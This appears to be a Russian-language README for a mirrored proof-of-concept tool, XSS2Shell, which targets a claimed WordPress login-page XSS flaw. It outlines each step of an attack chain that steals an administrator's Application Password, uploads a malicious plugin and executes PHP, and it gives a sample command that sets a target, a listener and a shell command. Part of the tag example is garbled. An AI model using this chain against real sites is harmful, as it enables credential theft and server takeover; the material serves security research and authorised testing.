
XSS2Shell (CVE-2026-64638) WordPress pre-auth XSS to RCE PoC mirror — WordSec, MIT; для авторизованного тестирования безопасности
Зеркало дистрибутива HackSpeak. Этот репозиторий является зеркалом образовательного PoC XSS2Shell (CVE-2026-64638), опубликованного WordSec, код идентичен оригиналу; оригинал — MIT License, Copyright (c) 2026 WordSec.
⚠️ Только для исследований безопасности и авторизованного тестирования, запускайте только на сайтах WordPress, которыми вы владеете или на оценку которых имеете письменное разрешение; PoC создаёт и удаляет временные публикации, не направляйте его на сторонних администраторов или производственные системы.
XSS2Shell (CVE-2026-64638) — это отражённый XSS до аутентификации на странице входа WordPress (wp-login.php), который по полной цепочке может быть повышен до выполнения PHP-кода на стороне сервера (RCE).
strip_tags() и WordPress KSES (wp_kses_post()) — при вставке пробела между < и именем тега (например, ) первый воспринимает это как обычный текст, а второй разбирает как допустимый HTML-элемент (// — все они в белом списке);< area<area><div><button>ajaxurl → встроенный user-profile.js на странице входа автоматически запускает jQuery POST → REST API JSONP (_jsonp) → Same Origin Method Execution (SOME, Paulos Yibelo 2022) → межоконный клик по кнопке авторизации Application Password администратора → кража учётных данных API → публикация страницы с <script> → загрузка вредоносного ZIP-плагина → прямое выполнение PHP (без активации);python3 xss2shell_poc.py -t http://wordpress.test --lhost 192.168.1.100 --lport 8080 -c "whoami"
| Параметр | Описание |
|---|---|
-t, --target | Базовый адрес WordPress (с http/https, автоматически нормализует завершающий слэш) |
-c, --command | Команда для выполнения после готовности shell |
--lhost / --lport | Адрес/порт прослушивания (lport 0 = случайный) |
--keep | Сохранить временную страницу публикации (по умолчанию удаляется) |
Зависимости: Python 3.7+, без сторонних пакетов; требуется вход администратора на целевой сайт и открытие URL атакующего (одно взаимодействие).